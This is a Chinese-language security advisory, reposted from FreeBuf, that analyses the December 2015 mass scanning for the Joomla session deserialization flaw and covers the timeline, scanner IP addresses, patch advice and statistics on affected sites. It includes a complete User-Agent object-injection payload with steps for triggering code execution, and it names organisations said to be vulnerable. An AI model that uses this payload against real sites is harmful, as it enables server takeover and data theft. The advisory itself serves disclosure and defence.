Joomla高危漏洞扫描事件分析

1.摘要

12月14日,Joomla官方网站紧急发布了一条由于安全漏洞引发的版本更新(3.4.6),根据安全公司sucuri对外发布的信息,此事扫描时间是利用了Joomla的反序列化特性的问题导致命令执行的高危漏洞。从中国时间12月13日凌晨开始,有3个IP针对全球的网站进行了大规模的扫描。根据白帽汇安全团队的分析,此次扫描有两个特性:一是针对中国的网站扫描的较少,大批量针对国外的网站进行的;二是扫描并没有触发实质性的破坏工作。

虽然此次扫描并没有进行实质性的破坏,但是漏洞本身是高危害性的,成功攻击的情况下会导致敏感数据丢失,服务器被控制,甚至是服务中断。建议使用了Joomla的网站尽快到官方网站进行补丁更新,在最新版本3.4.6之前的所有版本都受影响。

通过对全球60万家采用Joomla的网站进行进一步分析,截至12月15日23点30分,此次漏洞影响至少超过49000家网站,绝大部分集中在国外(美国排名第一),国内目前监控到超过600家网站存在漏洞,我们会在后续持续更新进一步动态。

2.事件回溯

12月13日,由IP 74.3.170.33 发起的小规模漏洞扫描; 12月14日到15日,由IP 146.0.72.83 和194.28.174.106发起的更大规模的全网扫描。 12月15日,安全公司sucuri的官方博客对外发布消息,表示在中国时间12月13日陆续截获到了来自3个IP的大规模扫描事件。 12月15日,joomla官方发布最新版本3.4.6修复该漏洞。 12月15日,国内各安全相关团队对互联网进行了激烈的比拼扫描,为国内互联网流量增长持续贡献价值。

经过技术分析,此次漏洞利用需要在一个session会话内进行两次发包,而实际上我们通过大量的安全日志分析只看到了第一次POC的发送,并没有看到第二次利用的过程,这是我们比较不理解的。所以我们也并没有看到实质性的破坏工作,这也是不幸中的万幸。

3.技术还原

通过Diff最新的补丁发现官方在补丁中删除了User-Agent的获取:

这个漏洞存在于反序列化session的过程中,在libraries/joomla/session/session.php 文件中,_validate函数通过set把User-Agent数据存入进数据库:

Joomla并没有采用php自带的session处理机制,而是用自己编写了存储session的容器(storage),其存储格式为『键名 + 竖线 + 经过 serialize() 函数反序列处理的值』,这里并没有正确处理多个竖线的情况。所以,攻击者就可以通过注入一个"|"符号,将它前面的部分全部认为是name,而|后面我就可以插入任意serialize字符串,进行触发反序列化漏洞了。

我们可以构造一个exp插入User-Agent:

User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:”phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}ð

进行访问站点,把恶意的User-Agent插入数据库,然后再此访问站点成功利用(注意cookie保证一致)

更多技术细节可以查看原文。

4.影响危害

易攻击对象:

采用Joomla系统 版本低于3.4.6(也就是12月15日之前的所有版本)

5.修补加固建议

此次事件利用的漏洞影响范围非常广泛,所以请所有采用Joomla的网站尽快升级至3.4.6版本或安装官方补丁。

注:下载补丁直接替换\libraries\joomla\session\session.php文件。

另外,可以通过加入一些安全云防护类产品来进行保护,比如360网站卫士,百度云加速,知道创宇加速乐等等,他们在漏洞发生后的第一时间内都增加了防护规则。

6.常见问题FAQ

Joomla是什么?

Joomla是一套在国外相当知名的内容管理系统(简称CMS),使用PHP语言和MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上执行。在国内实际应用的场景不算太多。

这次扫描事件有什么危害?

成功的入侵能够导致敏感数据丢失,服务器被完全控制,甚至是服务中断。

影响范围有多大?

全球大约有60万采用Joomla进行建站的网站,中国互联网大约有11000家网站。通过白帽汇安全团队的监控,至少有49000家网站受影响,主要集中在美国,国内实际影响的网站数超过627家。

到哪下载补丁?

3.x和2.x版本地址下载,请阅读原文

我应该怎么做?

参考修复建议,直接更新版本或者补丁。

如果发现了入侵痕迹,还要将已经入侵成功的后门进行清除。

7.影响的部分网站

此次漏洞影响的网站主要集中在国外,全球漏洞排名前十的国家是:

11781 美国 6522 德国 3622 波兰 3474 荷兰 2427 俄罗斯 2423 法国 1751 英国 1392 意大利 1232 澳大利亚 1049 加拿大

国内影响的部分知名网站:

国家林业局 OPPO手机 中央广播电视大学 华东政法大学 香港中文大学 GLP集团 中山大学 东莞电子科技大学 红豆集团 富国集团 陕西师范大学 商丘廉政网 世界O2O博览会 博雅方略咨询(集团) 石家庄铁道大学 葵花游戏 凉山矿业股份有限公司 四姑娘山官方网站。

国外影响的部分知名网站:

哈佛大学 麻省理工大学 剑桥大学 Intel IEEE Honda 牛津大学 东京大学 加州州议会大厦博物馆 Utah尤他政府网 南佛罗里达大学 Amtrak警察局 CashStar。

对应的世界地图为:

8.参考

https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

https://github.com/80vul/phpcodz/blob/master/research/pch-013.md

https://github.com/rapid7/metasploit-framework/issues/6347

http://php.net/session_set_save_handler

http://php.net/manual/zh/session.configuration.php#ini.session.serialize-handler

https://github.com/joomla/joomla-cms/compare/3.4.5...3.4.6?diff=split&name=3.4.6

http://drops.wooyun.org/papers/11330

*本文作者:白帽汇(企业账号),转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2015-12-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏字根中文校对软件

Apache CloudStack 4.5.2 新特性一览

     Apache CloudStack 4.5.2 新特性一览 ? CloudStack 4.5.2 相比前一个版本修复了大约 200 个Bug。   ...

31360
来自专栏企鹅号快讯

各种NB的国外黑客网站

这次说说一些非常有价值的国外黑客网站大全! 有需要的可保存下来细细琢磨! 本公众号提供了图书馆及下载专区。该图书馆为初学者提供了黑客知识和计算机技术基础知识。下...

1.9K100
来自专栏云计算D1net

使用云计算灾难恢复计划制定勒索软件恢复策略

如今,企业需要确保快照和云计算出现勒索软件,此外对备份存储执行严格的控制,以增加应对攻击的安全性。 如果勒索软件没有让IT人员夜不能寐,那么他很幸运。而如果一个...

44560
来自专栏SAP最佳业务实践

SAP最佳业务实践:SD–外贸出口处理(118)-3销售订单

一、VA01输入销售订单 在此活动中,您可以输入一个销售订单。 后勤 ®销售和分销 ®销售®订单®创建 如果已在系统中安装可退货处理 业务情景,并使用物料 H...

46790
来自专栏FreeBuf

系统清理工具CCleaner后门事件后续:黑客删除服务器内容,Avast 公布受感染公司名单

Avast 公司的威胁情报小组今天发布了上周 CCleaner 后门事件的新细节。 研究显示,CCleaner 黑客用于存储受感染主机数据的数据库空间不足,因此...

320100
来自专栏黑白安全

施耐德电气修补16 个 U.motion Builder 软件漏洞

据外媒报道,施耐德电气于上周向其客户通报说已修复 U.motion Builder 最新版本中的 16 个漏洞,其中包括那些被评为严重和高危的漏洞,例如可能导致...

8130
来自专栏FreeBuf

新加坡新保集团(SingHealth)网络攻击事件的可疑线索分析

近期,安全公司 Trustwave 旗下 SpiderLabs 实验室发现了可能与新加坡新保集团(SingHealth)网络攻击相关的一些信息线索,在前一篇文章...

9420
来自专栏源哥的专栏

基于linux的嵌入IPv4协议栈的内容过滤防火墙系统(2)-概要引言

概要:在Linux系统下,具有图形界面的防火墙系统很少,而包含内容过滤的防火墙系统更可以说是少之又少,本程序不仅具有防火墙功能,而且可以对rar、zip压缩格式...

7130
来自专栏FreeBuf

新型僵尸网络:Wonder Botnet深入分析

CSE CybSec Z-Lab恶意软件实验室在调查暗网恶意代码时发现了一个名为Wonder botnet的新僵尸网络,该恶意软件由Downloader和真正的...

28260
来自专栏信安之路

打造属于自己的 Wi-Fi “DOS” 攻击工具——Wi-Fi_deauther

一块不起眼的板子,可能在一些人眼中他就没有利用价值,而另一些人却看到了不一样的板子,当我们赋予了他新的生命力,他就会焕然一新,工具的价值取决于人,当你赋予了他什...

25020

扫码关注云+社区

领取腾讯云代金券